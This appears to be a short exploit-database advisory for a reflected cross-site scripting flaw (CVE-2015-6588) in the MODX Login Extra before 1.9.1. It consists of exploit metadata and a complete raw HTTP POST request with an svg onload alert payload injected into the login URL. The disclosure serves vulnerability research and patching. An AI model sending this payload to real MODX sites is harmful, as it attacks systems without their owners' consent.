MODX Login Extra versions prior to 1.9.1 suffer from a cross site scripting vulnerability.
8866751a93597637a538bf0220137db267a389e38a5051f40a3903cc78ebdc36
# Exploit Title: MODX Cross-Site Scripting on Login Screen
# Date: 2015/11/24
# Exploit Author: fenceposterror
# Vendor Homepage: http://modx.com
# Version: MODX Login Extra before Version 1.9.1.
# CVE : 2015-6588
POST /login.html?a"><svg/onload=alert(1)> HTTP/1.1
Host: vulnerable-installation.tld
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
username=admin&password=admin&returnUrl=%2Fde%2F&service=login&Login=Login